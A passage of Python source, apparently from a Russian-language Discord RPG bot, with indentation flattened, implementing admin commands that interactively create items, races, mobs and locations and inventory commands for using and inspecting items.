await message.edit(embed = embed(type, name, act, ndi, create, uses, image, quality, f'Укажите описание предмета или `none`: (макс 300 символов)'))
description = await description_f(message, ctx)
if description == False:
return
else:
item.update({'description': description})
await message.edit(embed = embed(type, name, act, ndi, create, uses, image, quality, description, f'Укажите описание предмета или `none`: (макс 2000 символов)'))
action_m = await action_m_f(message, ctx)
if action_m == False:
return
else:
item.update({'action_m': action_m})
await message.edit(embed = embed(type, name, act, ndi, create, uses, image, quality, description, action_m, f'Укажите названия рас, которые могут использовать этот предмет или `all`:'))
race_u = await race_u_f(message, ctx, server)
if race_u == False:
return
else:
item.update({'race_u': race_u})
await message.edit(embed = embed(type, name, act, ndi, create, uses, image, quality, description, action_m, race_u, f'Укажите эмоджи предмета:'))
emoji_v = await emoji_f(message, ctx)
if emoji_v == False:
return
else:
item.update({'emoji': emoji_v})
await message.edit(embed = embed( type, name, act, ndi, create, uses, image, quality, description, action_m, race_u, emoji_v))
elif type == 'role':
def embed(type = 'Не указано', name = 'Не указано', act = 'Не указано', style = 'Не указано', image = 'Не указано', quality = 'Не указано', description = 'Не указано', action_m = 'Не указано', race_u = 'Не указано', emoji_v = 'Не указано'):
nonlocal server
emb = discord.Embed(title = "Создание предмета", description = "", color=server['embed_color'])
emb.add_field(name = "Тип предмета", value = f"{type}")
emb.add_field(name = "Имя предмета", value = f"{name}")
if act == 'Не указано' or act == f"Укажите [id](https://support.discord.com/hc/ru/articles/206346498-%D0%93%D0%B4%D0%B5-%D0%BC%D0%BD%D0%B5-%D0%BD%D0%B0%D0%B9%D1%82%D0%B8-ID-%D0%BF%D0%BE%D0%BB%D1%8C%D0%B7%D0%BE%D0%B2%D0%B0%D1%82%D0%B5%D0%BB%D1%8F-%D1%81%D0%B5%D1%80%D0%B2%D0%B5%D1%80%D0%B0-%D1%81%D0%BE%D0%BE%D0%B1%D1%89%D0%B5%D0%BD%D0%B8%D1%8F-) роли `{name}`":
emb.add_field(name = "Id роли", value = f"{act}")
else:
emb.add_field(name = "Id роли", value = f"<@&{act}>")
emb.add_field(name = "Стиль предмета", value = f"{style}")
if image != 'Не указано' and image != 'none' and image != "Укажите изображение предмета:" and image != None:
emb.set_thumbnail(url = image)
emb.add_field(name = "Качество предмета", value = f"{quality}")
emb.add_field(name = "Описание предмета", value = f"{description}")
emb.add_field(name = "Сообщение при активации", value = f"{action_m}")
if race_u != 'Не указано' and race_u != 'Укажите названия рас, которые могут использовать этот предмет или `all`:' and race_u != 'all' and race_u != None:
emb.add_field(name = "Расы с возможностью использовать", value = f"{','.join(str(x) for x in race_u)}")
else:
emb.add_field(name = "Расы с возможностью использовать", value = f"{race_u}")
emb.add_field(name = "Эмоджи", value = f"{emoji_v}")
emb.set_footer(text = 'Отправляйте сообщения в чат без использованеи команд, на одно указание у вас 60 сек.')
return emb
await message.edit(embed = embed(type, f'Укажите название предмета: (не более 150 символов)'))
name = await name_f(message, ctx)
if name == False:
return
else:
item.update({ 'name': name})
try:
await message.edit(embed = embed(type, name, f"Укажите [id](https://support.discord.com/hc/ru/articles/206346498-%D0%93%D0%B4%D0%B5-%D0%BC%D0%BD%D0%B5-%D0%BD%D0%B0%D0%B9%D1%82%D0%B8-ID-%D0%BF%D0%BE%D0%BB%D1%8C%D0%B7%D0%BE%D0%B2%D0%B0%D1%82%D0%B5%D0%BB%D1%8F-%D1%81%D0%B5%D1%80%D0%B2%D0%B5%D1%80%D0%B0-%D1%81%D0%BE%D0%BE%D0%B1%D1%89%D0%B5%D0%BD%D0%B8%D1%8F-) роли `{name}`"))
msg = await self.bot.wait_for('message', timeout=60.0, check=lambda message: message.author == ctx.author and message.channel.id == ctx.channel.id)
except asyncio.TimeoutError:
await ctx.send("Время вышло.")
return
else:
try:
await msg.delete()
except Exception:
pass
try:
act = int(msg.content)
except Exception:
await ctx.send("Требовалось указать id роли, повторите настройку ещё раз.")
return
role = ctx.guild.get_role(act)
try:
act = role.id
except Exception:
await ctx.send("Требовалось указать id существующей роли, повторите настройку ещё раз.")
return
item.update({ 'act': act})
text = "`add` - добавляет роль при использовании.\n`remove` - удаляет роль при использовании.\n"
try:
emb = discord.Embed(title = "Стили:",
description = text, color=server['embed_color'])
msg1 = await ctx.send(embed = emb)
await message.edit(embed = embed(type, name, act, f"Укажите стиль `{name}`"))
msg = await self.bot.wait_for('message', timeout=60.0, check=lambda message: message.author == ctx.author and message.channel.id == ctx.channel.id)
except asyncio.TimeoutError:
await ctx.send("Время вышло.")
return
else:
try:
await msg.delete()
await msg1.delete()
except Exception:
pass
if msg.content in ['add', 'remove']:
item.update({ 'style': msg.content})
else:
await ctx.send("Вы указали не действительный стиль предмета, выберите 1 из (add, remove) и повторите создание снова!")
return
style = msg.content
await message.edit(embed = embed(type, name, act, style, "Укажите изображение предмета:"))
image = await image_f(message, ctx)
if image == False:
return
else:
item.update({'image': image})
await message.edit(embed = embed(type, name, act, style, image, f"Укажите качество предмета: "))
quality = await quality_f(message, ctx)
if quality == False:
return
else:
item.update({'quality': quality})
await message.edit(embed = embed(type, name, act, style, image, quality, f'Укажите описание предмета или `none`: (макс 300 символов)'))
description = await description_f(message, ctx)
if description == False:
return
else:
item.update({'description': description})
await message.edit(embed = embed(type, name, act, style, image, quality, description, f'Укажите описание предмета или `none`: (макс 2000 символов)'))
action_m = await action_m_f(message, ctx)
if action_m == False:
return
else:
item.update({'action_m': action_m})
await message.edit(embed = embed(type, name, act, style, image, quality, description, action_m, f'Укажите названия рас, которые могут использовать этот предмет или `all`:'))
race_u = await race_u_f(message, ctx, server)
if race_u == False:
return
else:
item.update({'race_u': race_u})
await message.edit(embed = embed(type, name, act, style, image, quality, description, action_m, race_u, f'Укажите эмоджи предмета:'))
emoji_v = await emoji_f(message, ctx)
if emoji_v == False:
return
else:
item.update({'emoji': emoji_v})
await message.edit(embed = embed( type, name, act, style, image, quality, description, action_m, race_u, emoji_v))
elif type == 'prop':
def embed(type = 'Не указано', name = 'Не указано', image = 'Не указано', description = 'Не указано', action_m = 'Не указано', emoji_v = 'Не указано'):
nonlocal server
emb = discord.Embed(title = "Создание предмета", description = "", color=server['embed_color'])
emb.add_field(name = "Тип предмета", value = f"{type}")
emb.add_field(name = "Имя предмета", value = f"{name}")
if image != 'Не указано' and image != 'none' and image != "Укажите изображение предмета:" and image != None:
emb.set_thumbnail(url = image)
emb.add_field(name = "Описание предмета", value = f"{description}")
emb.add_field(name = "Сообщение при активации", value = f"{action_m}")
emb.add_field(name = "Эмоджи", value = f"{emoji_v}")
emb.set_footer(text = 'Отправляйте сообщения в чат без использованеи команд, на одно указание у вас 60 сек.')
return emb
await message.edit(embed = embed(type, f'Укажите название предмета: (не более 150 символов)'))
name = await name_f(message, ctx)
if name == False:
return
else:
item.update({ 'name': name})
await message.edit(embed = embed(type, name, "Укажите изображение предмета:"))
image = await image_f(message, ctx)
if image == False:
return
else:
item.update({'image': image})
await message.edit(embed = embed(type, name, image, f'Укажите описание предмета или `none`: (макс 500 символов)'))
description = await description_f(message, ctx)
if description == False:
return
else:
item.update({'description': description})
await message.edit(embed = embed(type, name, image, description, f'Укажите описание предмета или `none`: (макс 2000 символов)'))
action_m = await action_m_f(message, ctx)
if action_m == False:
return
else:
item.update({'action_m': action_m})
await message.edit(embed = embed(type, name, image, description, action_m, f'Укажите эмоджи предмета:'))
emoji_v = await emoji_f(message, ctx)
if emoji_v == False:
return
else:
item.update({'emoji': emoji_v})
await message.edit(embed = embed( type, name, image, description, action_m, emoji_v))
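# Persisting the item: the new id is max(existing numeric ids) + 1, falling back
# to 1 for a server with no items yet; the item dict is then written back under
# server['items'][str(new_id)] with a single update_one call.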
try:
l = server['items']
lst = []
for i in l.keys():
lst.append(int(i))
l = max(lst)+1
except Exception:
l = 1
await ctx.send(f"Предмет с id {l} создан!\n{item}")
server = servers.find_one({"server": ctx.guild.id})
il = server['items']
il.update({f'{l}': item})
servers.update_one({'server':ctx.guild.id},{"$set":{'items': il}})
@commands.command(usage = '-', description = 'Создание расы.')
async def create_race(self, ctx):
global servers
if funs.roles_check(ctx.author, ctx.guild.id) == False:
await ctx.send("У вас недостаточно прав для использования этой команды!")
return
server = servers.find_one({'server':ctx.guild.id})
race = {}
def embed(name, hp = "не указано", mana = "не указано", items = "не указано", description = "не указано", image = 'Не указано'):
nonlocal server
emb = discord.Embed(title = "Создание расы", description = "", color=server['embed_color'])
emb.add_field(name = "Название:", value = f"{name}")
emb.add_field(name = "Максимальное здоровье:", value = f"{hp}")
emb.add_field(name = "Максимальная мана:", value = f"{mana}")
emb.add_field(name = "Начальные предметы:", value = f"{items}")
emb.add_field(name = "Описание:", value = f"{description}")
if image != 'Не указано' and image != 'none' and image != "Укажите изображение расы:":
emb.set_thumbnail(url = image)
return emb
message = await ctx.send(embed = embed("не указано"))
try:
await message.edit(embed = embed('Укажите название расы (не более 100 символов)'))
msg = await self.bot.wait_for('message', timeout=120.0, check=lambda message: message.author == ctx.author and message.channel.id == ctx.channel.id)
except asyncio.TimeoutError:
await ctx.send("Время вышло.")
return
else:
try:
await msg.delete()
except Exception:
pass
if len(msg.content) > 100:
await ctx.send('Название больше 100 символов!')
return
else:
name = msg.content
try:
await message.edit(embed = embed(name, 'Укажите максимальное здоровье для расы'))
msg = await self.bot.wait_for('message', timeout=120.0, check=lambda message: message.author == ctx.author and message.channel.id == ctx.channel.id)
except asyncio.TimeoutError:
await ctx.send("Время вышло.")
return
else:
try:
await msg.delete()
except Exception:
pass
try:
hp = int(msg.content)
race.update({'hp': int(msg.content)})
except Exception:
await ctx.send('Укажите число!')
return
try:
await message.edit(embed = embed(name, hp, 'Укажите максимальную ману для расы'))
msg = await self.bot.wait_for('message', timeout=120.0, check=lambda message: message.author == ctx.author and message.channel.id == ctx.channel.id)
except asyncio.TimeoutError:
await ctx.send("Время вышло.")
return
else:
try:
await msg.delete()
except Exception:
pass
try:
mana = int(msg.content)
race.update({'mana': int(msg.content)})
except Exception:
await ctx.send('Укажите число!')
return
try:
b = 50
act = []
emb = discord.Embed(title = "",
description = "Укажите id предметов для расы, формат: 12 12 1 2 2\nЕсли вы хотите увеличить колличество предмета то просто укажите его повторно, пример: 11 11 (будет добавлено 2 предмета с id 11)\nУкажите `none` если ничего.", color=server['embed_color'])
msg1 = await ctx.send(embed = emb)
await message.edit(embed = embed(name, hp, mana, f"Укажите id предметов для расы или `none`: (максимум {b} предметов)"))
msg = await self.bot.wait_for('message', timeout=60.0, check=lambda message: message.author == ctx.author and message.channel.id == ctx.channel.id)
except asyncio.TimeoutError:
await ctx.send("Время вышло.")
return
else:
try:
await msg.delete()
await msg1.delete()
except Exception:
pass
if msg.content == 'none':
act = None
else:
try:
try:
act1 = msg.content.split()
a = 0
for i in act1:
if a > b:
await ctx.send(f"Вы указали количество предметов больше допустимого ({b})")
return
a += 1
act.append(int(i))
except Exception:
await ctx.send("Требовалось указать __число__, повторите настройку ещё раз.")
return
for i in act:
server['items'][str(i)]
except Exception:
await ctx.send("Требовалось указать __id__ (число) существующего предмета, повторите настройку ещё раз.")
return
items = act
race.update({'items': act})
try:
await message.edit(embed = embed(name, hp, mana, items, f'Укажите описание расы или `none`: (макс 300 символов)'))
msg = await self.bot.wait_for('message', timeout=60.0, check=lambda message: message.author == ctx.author and message.channel.id == ctx.channel.id)
except asyncio.TimeoutError:
await ctx.send("Время вышло.")
return
else:
try:
await msg.delete()
except Exception:
pass
description = str(msg.content)
if description == 'none':
race.update({ 'description': None})
description = None
elif len(description) > 0 and len(description) < 301:
race.update({ 'description': msg.content})
description = msg.content
else:
await ctx.send("Требовалось указать описание (макс 300 символов) или `none`, повторите настройку ещё раз!")
return
try:
text = "Требуется указать __ссылку__ на изображение или `none`"
emb = discord.Embed(title = "Изображение:",
description = text, color=server['embed_color'])
msg1 = await ctx.send(embed = emb)
await message.edit(embed = embed(name, hp, mana, items, description, "Укажите изображение расы:"))
msg = await self.bot.wait_for('message', timeout=60.0, check=lambda message: message.author == ctx.author and message.channel.id == ctx.channel.id)
except asyncio.TimeoutError:
await ctx.send("Время вышло.")
return
else:
try:
await msg.delete()
except Exception:
pass
if msg.content != 'none':
try:
emb1 = discord.Embed(title = "Изображение", color=server['embed_color'])
emb1.set_thumbnail(url = msg.content)
msg2 = await ctx.send(embed = emb1)
except Exception:
await ctx.send("Требовалось указать __ссылку__, повторите настройку ещё раз.")
return
else:
msg.content = None
race.update({'image': msg.content})
image = msg.content
try:
await msg1.delete()
await msg2.delete()
except Exception:
pass
await message.edit(content = 'Раса создана', embed = embed(name, hp, mana, items, description, image))
server = servers.find_one({"server": ctx.guild.id})
il = server['races']
il.update({f'{name}': race})
servers.update_one({'server':ctx.guild.id},{"$set":{'races': il}})
@commands.command(usage = '-', description = 'Информация о расах.')
async def race_info(self, ctx):
server = servers.find_one({"server": ctx.guild.id})
def list_counter(list):
ld = {}
for i in list:
if i not in ld.keys():
ld[i] = 1
elif i in ld.keys():
ld[i] += 1
list = []
for el in ld.keys():
list.append(f'{el} x{ld[el]}')
return list
async def inf(race, msg):
nonlocal ctx
nonlocal server
r = server['races'][race]
if r['items'] == None:
invv = ['Пусто']
else:
l = []
for i in r['items']: l.append(server['items'][str(i)]['name'])
invv = list_counter(l)
emb = discord.Embed( description = f'**🦄 | {race}**', color=server['embed_color'])
emb.add_field(name = 'Данные', value = f'<:heart:886874654072008705> Начальное здоровье: {r["hp"]}\n<:c_mana:886893705594818610> Начальная мана: {r["mana"]}\n<:p_backpack:886909262712930325> Начальные предметы: \n`{", ".join(invv)}`')
if r['description'] == None:
emb.add_field(name = 'Описание', value = f'Ничего не известно | (отсутствует)')
else:
emb.add_field(name = 'Описание', value = f'{r["description"]}')
if r['image'] != None:
emb.set_thumbnail(url = r['image'])
await msg.edit(embed = emb, view = None)
class Dropdown(discord.ui.Select):
def __init__(self, races, ctx, msg, emb):
options = []
for k in races.keys():
options.append(discord.SelectOption(label=f'{k}'))
super().__init__(placeholder='Выберите расу...', min_values=1, max_values=1, options=options)
async def callback(self, interaction: discord.Interaction):
if ctx.author.id == interaction.user.id:
await inf(self.values[0], msg)
self.view.stop()
else:
await interaction.response.send_message(f'Откройте свой инвентарь!', ephemeral = True)
class DropdownView(discord.ui.View):
def __init__(self, inv, ctx, msg, emb):
super().__init__()
self.add_item(Dropdown(inv, ctx, msg, emb))
emb = discord.Embed(title = '🦄 | Расы', description = f'Выберите, о какой расе вы хотите узнать информацию', color=server['embed_color'])
msg = await ctx.send(embed = emb)
await msg.edit(embed = emb, view=DropdownView(server['races'], ctx, msg, emb))
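# use: fuzzy-matches the given name against the author's inventory (token_sort_ratio/ratio > 80
# or an exact match). A single hit asks for confirmation via reactions; several hits show a dropdown.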
@commands.command(usage = '(item_name)', description = 'Использовать предмет из инвентаря.')
async def use(self, ctx, *, i_name:str):
user = funs.user_check(ctx.author, ctx.guild)
server = servers.find_one({"server": ctx.guild.id})
s_i = []
for i in user['inv']:
print(i['name'])
print(fuzz.token_sort_ratio(i_name, i['name']), fuzz.ratio(i_name,i['name']), i_name == i['name'])
if fuzz.token_sort_ratio(i_name, i['name']) > 80 or fuzz.ratio(i_name,i['name']) > 80 or i_name == i['name']:
s_i.append(i)
if len(s_i) == 1:
emb = discord.Embed(description = f'Вы хотите использовать **{s_i[0]["name"]}** ?', title = '<:inventory_b:886909340550823936> | Инвентарь', color=server['embed_color'])
msg = await ctx.send(embed= emb)
r = await funs.reactions_check( ["✅", "❌"], ctx.author, msg, True)
if r != 'Timeout':
if str(r.emoji) == "✅":
print('Использование')
else:
print('Отмена')
else:
await ctx.send('Время вышло')
if len(s_i) == 0:
emb = discord.Embed(title = '<:inventory_b:886909340550823936> | Инвентарь', description = f'В вашем инвентаре не было найдено такого предмета!\nПопробуйте указать более точное название или осмотрите свой инвентарь более подробно!', color=server['embed_color'])
msg = await ctx.send(embed= emb)
if len(s_i) > 1:
inv = {}
items = []
for i in server['items'].keys():
items.append(server['items'][i])
for i in s_i:
u = i.copy()
del i['iid']
if i in items:
if i['name'] in list(inv.keys()):
inv.update({ i['name']: { 'it':i, 'count': inv[i['name']]['count']+1 } })
else:
inv.update({ i['name']: { 'it':i, 'count': 1 } })
if i not in items:
if f'{i["name"]} (#{u["iid"]})' in list(inv.keys()):
inv.update({ f'{i["name"]} (#{u["iid"]})': { 'it':i, 'count': inv[i['name']]['count']+1 } })
else:
inv.update({ f'{i["name"]} (#{u["iid"]})': { 'it':i, 'count': 1 } })
class Dropdown(discord.ui.Select):
def __init__(self, inv, ctx, msg, emb):
options = []
for k in inv:
options.append(discord.SelectOption(label=f'{k}'))
super().__init__(placeholder='Выберите используемый предмет...', min_values=1, max_values=1, options=options)
async def callback(self, interaction: discord.Interaction):
if ctx.author.id == interaction.user.id:
await interaction.response.send_message(f'{self.values[0]}', ephemeral = True)
self.view.stop()
else:
await interaction.response.send_message(f'Откройте свой инвентарь!', ephemeral = True)
class DropdownView(discord.ui.View):
def __init__(self, inv, ctx, msg, emb):
super().__init__()
self.add_item(Dropdown(inv, ctx, msg, emb))
text = ''
n = 0
for k in inv:
i = inv[k]
n += 1
text += f'{n}# {k} x{i["count"]}\n'
emb = discord.Embed(title = '<:inventory_b:886909340550823936> | Инвентарь', description = f'В инвентаре найдено несколько совпадений:\n{text}', color=server['embed_color'])
msg = await ctx.send(embed = emb)
await msg.edit(embed = emb, view=DropdownView(inv, ctx, msg, emb))
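# item_info: like `use`, fuzzy-matches an inventory item, then renders its data
# (type, rarity, element, allowed races, description) via funs.item_info.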
@commands.command(usage = '(item_name)', description = 'Информация о предмете.')
async def item_info(self, ctx, *, i_name:str):
user = funs.user_check(ctx.author, ctx.guild)
server = servers.find_one({"server": ctx.guild.id})
async def inf(item, msg):
nonlocal ctx
nonlocal server
i = funs.item_info(item, ctx.guild.id)
emb = discord.Embed(description = f"**{i['emoji']} | {i['name']}**", color=server['embed_color'])
emb.add_field( name = f'Данные', value= f"Тип: {i['type']}\n\n{i['act_title']}\n\nРедкость: {i['quality']}\nЭлемент: {i['element']}\n{i['race_u']}", inline = True )
emb.add_field( name = f'Описание', value= f"{i['description']}", inline = True )
if i['image'] != None:
emb.set_thumbnail(url = i['image'])
await msg.edit(embed = emb, view = None)
s_i = []
for i in user['inv']:
if fuzz.token_sort_ratio(i_name, i['name']) > 80 or fuzz.ratio(i_name,i['name']) > 80 or i_name == i['name']:
s_i.append(i)
inv = {}
items = []
for i in server['items'].keys():
items.append(server['items'][i])
for i in s_i:
u = i.copy()
del i['iid']
if i in items:
if i['name'] in list(inv.keys()):
inv.update({ i['name']: { 'it':i, 'count': inv[i['name']]['count']+1 } })
else:
inv.update({ i['name']: { 'it':i, 'count': 1 } })
if i not in items:
if f'{i["name"]} (#{u["iid"]})' in list(inv.keys()):
inv.update({ f'{i["name"]} (#{u["iid"]})': { 'it':i, 'count': inv[i['name']]['count']+1 } })
else:
inv.update({ f'{i["name"]} (#{u["iid"]})': { 'it':i, 'count': 1 } })
if len(inv) == 1:
emb = discord.Embed(description = f'<:inventory_b:886909340550823936> | Инвентарь', color=server['embed_color'])
msg = await ctx.send(embed = emb)
await inf(s_i[0], msg)
if len(inv) == 0:
emb = discord.Embed(title = '<:inventory_b:886909340550823936> | Инвентарь', description = f'В вашем инвентаре не было найдено такого предмета!\nПопробуйте указать более точное название или осмотрите свой инвентарь более подробно!', color=server['embed_color'])
msg = await ctx.send(embed= emb)
if len(inv) > 1:
class Dropdown(discord.ui.Select):
def __init__(self, ctx, msg, options, placeholder, min_values, max_values:int, rem_args):
#options.append(discord.SelectOption(label=f''))
super().__init__(placeholder=placeholder, min_values=min_values, max_values=max_values, options=options)
inv = rem_args[0]
async def callback(self, interaction: discord.Interaction):
if ctx.author.id == interaction.user.id:
print(self.values[0])
self.view.stop()
await inf(inv[self.values[0]]['it'], msg)
else:
await interaction.response.send_message(f'Откройте свой инвентарь!', ephemeral = True)
class DropdownView(discord.ui.View):
def __init__(self, ctx, msg, options:list, placeholder:str, min_values:int = 1, max_values:int = 1, timeout: float = 20.0, rem_args:list = []):
super().__init__(timeout=timeout)
self.add_item(Dropdown(ctx, msg, options, placeholder, min_values, max_values, rem_args))
async def on_timeout(self):
await msg.edit(view = None)
text = ''
n = 0
for k in inv:
i = inv[k]
n += 1
text += f'{n}# {k} x{i["count"]}\n'
options = []
for k in inv:
options.append(discord.SelectOption(label=f'{k}', emoji = inv[k]['it']['emoji']))
emb = discord.Embed(title = '<:inventory_b:886909340550823936> | Инвентарь', description = f'В инвентаре найдено несколько совпадений:\n{text}', color=server['embed_color'])
msg = await ctx.send(embed = emb)
await msg.edit(view=DropdownView(ctx, msg, options = options, placeholder = 'Сделайте выбор...', min_values = 1, max_values=1, timeout = 20.0, rem_args = [inv, emb]))
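# item_add: admin command; gives `rp` copies of item `id` to a member (defaults to the author)
# by appending funs.creat_item results to their inventory.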
@commands.command(usage = '(id) (r) [member]', description = 'Выдать предмет.')
async def item_add(self, ctx, id:int, rp:int, member:discord.Member = None):
if member == None:
member = ctx.author
if funs.roles_check(ctx.author, ctx.guild.id) == False:
await ctx.send("У вас недостаточно прав для использования этой команды!")
return
server = servers.find_one({"server": ctx.guild.id})
user = funs.user_check(member, ctx.guild)
act_title = '-'
try:
server['items'][str(id)]
except Exception:
await ctx.send(f"Указанный вами предмет не найден!\nПредметы: {', '.join(str(x) for x in list(server['items'].keys()) )} ")
return
item = server['items'][str(id)]
while rp > 0:
user['inv'].append(funs.creat_item(ctx.guild.id, id))
rp -= 1
funs.user_update(member.id, ctx.guild, 'inv', user['inv'])
await ctx.send('Предмет(ы) добавлен(ы)!')
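# create_mob: admin command. Defines the input helpers (name, damage, heal, armor, image,
# description, drop, element) and a summary embed for an interactive mob-creation flow.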
@commands.command(usage = '-', description = 'Создание моба.')
async def create_mob(self, ctx):
if funs.roles_check(ctx.author, ctx.guild.id) == False:
await ctx.send("У вас недостаточно прав для использования этой команды!")
return
server = servers.find_one({"server": ctx.guild.id})
mob = {}
async def name_f(message, ctx):
try:
msg = await self.bot.wait_for('message', timeout=60.0, check=lambda message: message.author == ctx.author and message.channel.id == ctx.channel.id)
except asyncio.TimeoutError:
await ctx.send("Время вышло.")
return False
else:
try:
await msg.delete()
except Exception:
pass
if len(msg.content) > 150:
await ctx.send("Название больше 150-ти символов")
return False
else:
return msg.content
async def damage_f(message, ctx):
try:
msg = await self.bot.wait_for('message', timeout=60.0, check=lambda message: message.author == ctx.author and message.channel.id == ctx.channel.id)
except asyncio.TimeoutError:
await ctx.send("Время вышло.")
return False
else:
try:
await msg.delete()
except Exception:
pass
try:
return int(msg.content)
except Exception:
await ctx.send("Требовалось указать __число__!")
return False
async def heal_f(message, ctx):
try:
msg = await self.bot.wait_for('message', timeout=60.0, check=lambda message: message.author == ctx.author and message.channel.id == ctx.channel.id)
except asyncio.TimeoutError:
await ctx.send("Время вышло.")
return False
else:
try:
await msg.delete()
except Exception:
pass
try:
return int(msg.content)
except Exception:
await ctx.send("Требовалось указать __число__!")
return False
async def armor_f(message, ctx):
try:
msg = await self.bot.wait_for('message', timeout=60.0, check=lambda message: message.author == ctx.author and message.channel.id == ctx.channel.id)
except asyncio.TimeoutError:
await ctx.send("Время вышло.")
return False
else:
try:
await msg.delete()
except Exception:
pass
try:
return int(msg.content)
except Exception:
await ctx.send("Требовалось указать __число__!")
return False
async def image_f(message, ctx):
try:
text = "Требуется указать __ссылку__ на изображение или `none`"
emb = discord.Embed(title = "Изображение:",
description = text, color=server['embed_color'])
msg1 = await ctx.send(embed = emb)
msg = await self.bot.wait_for('message', timeout=60.0, check=lambda message: message.author == ctx.author and message.channel.id == ctx.channel.id)
except asyncio.TimeoutError:
await ctx.send("Время вышло.")
return False
else:
try:
await msg.delete()
except Exception:
pass
if msg.content != 'none':
try:
emb1 = discord.Embed(title = "Изображение", color=server['embed_color'])
emb1.set_thumbnail(url = msg.content)
msg2 = await ctx.send(embed = emb1)
image = msg.content
except Exception:
await ctx.send("Требовалось указать __ссылку__, повторите настройку ещё раз.")
return False
if msg.content == 'none':
image = None
try:
await msg1.delete()
await msg2.delete()
except Exception:
pass
return image
async def description_f(message, ctx):
try:
msg = await self.bot.wait_for('message', timeout=60.0, check=lambda message: message.author == ctx.author and message.channel.id == ctx.channel.id)
except asyncio.TimeoutError:
await ctx.send("Время вышло.")
return False
else:
try:
await msg.delete()
except Exception:
pass
description = str(msg.content)
if description == 'none':
return None
elif len(description) > 0 and len(description) < 501:
return msg.content
else:
await ctx.send("Требовалось указать описание (макс 500 символов) или `none`, повторите настройку ещё раз!")
return False
async def drop_f(message, ctx):
try:
msg = await self.bot.wait_for('message', timeout=60.0, check=lambda message: message.author == ctx.author and message.channel.id == ctx.channel.id)
except asyncio.TimeoutError:
await ctx.send("Время вышло.")
return False
else:
try:
await msg.delete()
except Exception:
pass
act = []
try:
try:
act1 = msg.content.split()
for i in act1:
act.append(int(i))
except Exception:
await ctx.send("Требовалось указать __число__, повторите настройку ещё раз.")
return False
for i in act:
server['items'][str(i)]
except Exception:
await ctx.send("Требовалось указать __id__ (число) существующего предмета, повторите настройку ещё раз.")
return False
return act
async def element_f(message, ctx):
try:
text = "`w` - <:water:888029916287885332>(water) Огонь >`х0.75`> Вода >`х1.25`> Земля\n`a` - <:air:888029789749919787>(air) Земля >`х0.75`> Воздух >`х1.25`> Огонь\n`f` - <:fire:888029761828425789>(fire) Воздух >`х0.75`> Огонь >`х1.25`> Вода\n`e` - <:earth:888029840945598534>(earth) Вода >`х0.75`> Земля >`х1.25`> Воздух\n\n<:fire:888029761828425789> >`х1.25`> <:water:888029916287885332> >`х1.25`> <:earth:888029840945598534> >`х1.25`> <:air:888029789749919787> >`х1.25`> <:fire:888029761828425789>\n\nУкажите `none` если у предмета нет стихии."
emb = discord.Embed(title = "Элементы:",
description = text, color=server['embed_color'])
msg1 = await ctx.send(embed = emb)
msg = await self.bot.wait_for('message', timeout=60.0, check=lambda message: message.author == ctx.author and message.channel.id == ctx.channel.id)
except asyncio.TimeoutError:
await ctx.send("Время вышло.")
return False
else:
try:
await msg1.delete()
await msg.delete()
except Exception:
pass
if msg.content in ['fire', 'water', 'air', 'earth', 'none', 'w', 'a', 'f', 'e']:
if msg.content in ['w', 'water']:
el = "w"
elif msg.content in ['a', 'air']:
el = "a"
elif msg.content in ['f', 'fire']:
el = "f"
elif msg.content in ['e', 'earth',]:
el = "e"
elif msg.content in ['none']:
el = None
return el
else:
await ctx.send("Требовалось указать 1 из элементов! (w, a, f, e)")
return False
def embed(name = 'Не указано', damage = 'Не указано', image = 'Не указано', quality = 'Не указано', description = 'Не указано', action_m = 'Не указано', race_u = 'Не указано', element = 'Не указано', emoji_v = 'Не указано'):
nonlocal server
emb = discord.Embed(title = "Создание предмета", description = "", color=server['embed_color'])
emb.add_field(name = "Имя моба", value = f"{name}")
emb.add_field(name = "Максимальный урон", value = f"{act}")
if image != 'Не указано' and image != 'none' and image != "Укажите изображение предмета:" and image != None:
emb.set_thumbnail(url = image)
emb.add_field(name = "Качество предмета", value = f"{quality}")
emb.add_field(name = "Описание предмета", value = f"{description}")
emb.add_field(name = "Сообщение при активации", value = f"{action_m}")
if race_u != 'Не указано' and race_u != 'Укажите названия рас, которые могут использовать этот предмет или `all`:' and race_u != 'all' and race_u != None:
emb.add_field(name = "Расы с возможностью использовать", value = f"{','.join(str(x) for x in race_u)}")
else:
emb.add_field(name = "Расы с возможностью использовать", value = f"{race_u}")
emb.add_field(name = "Элемент", value = f"{element}")
emb.add_field(name = "Эмоджи", value = f"{emoji_v}")
emb.set_footer(text = 'Отправляйте сообщения в чат без использования команд, на одно указание у вас 60 сек.')
return emb
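# create_location: admin command; defines the same style of input helpers for an
# interactive location-creation flow.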
@commands.command(usage = '-', description = 'Создание локации.')
async def create_location(self, ctx):
if funs.roles_check(ctx.author, ctx.guild.id) == False:
await ctx.send("У вас недостаточно прав для использования этой команды!")
return
server = servers.find_one({"server": ctx.guild.id})
async def name_f(message, ctx):
try:
msg = await self.bot.wait_for('message', timeout=60.0, check=lambda message: message.author == ctx.author and message.channel.id == ctx.channel.id)
except asyncio.TimeoutError:
await ctx.send("Время вышло.")
return False
else:
try:
await msg.delete()
except Exception:
pass
if len(msg.content) > 150:
await ctx.send("Название больше 150-ти символов")
return False
else:
return msg.content
async def image_f(message, ctx):
try:
text = "Требуется указать __ссылку__ на изображение или `none`"
emb = discord.Embed(title = "Изображение:",
description = text, color=server['embed_color'])
msg1 = await ctx.send(embed = emb)
msg = await self.bot.wait_for('message', timeout=60.0, check=lambda message: message.author == ctx.author and message.channel.id == ctx.channel.id)
except asyncio.TimeoutError:
await ctx.send("Время вышло.")
return False
else:
try:
await msg.delete()
except Exception:
pass
if msg.content != 'none':
try:
emb1 = discord.Embed(title = "Изображение", color=server['embed_color'])
emb1.set_thumbnail(url = msg.content)
msg2 = await ctx.send(embed = emb1)
image = msg.content
except Exception:
await ctx.send("Требовалось указать __ссылку__, повторите настройку ещё раз.")
return False
if msg.content == 'none':
image = None
try:
await msg1.delete()
await msg2.delete()
except Exception:
pass
return image
async def description_f(message, ctx):
try:
msg = await self.bot.wait_for('message', timeout=60.0, check=lambda message: message.author == ctx.author and message.channel.id == ctx.channel.id)
except asyncio.TimeoutError:
await ctx.send("Время вышло.")
return False
else:
try:
await msg.delete()
except Exception:
pass
description = str(msg.content)
if description == 'none':
return None
elif len(description) > 0 and len(description) < 501:
return msg.content
else:
await ctx.send("Требовалось указать описание (макс 500 символов) или `none`, повторите настройку ещё раз!")
return False
async def element_f(message, ctx):
try:
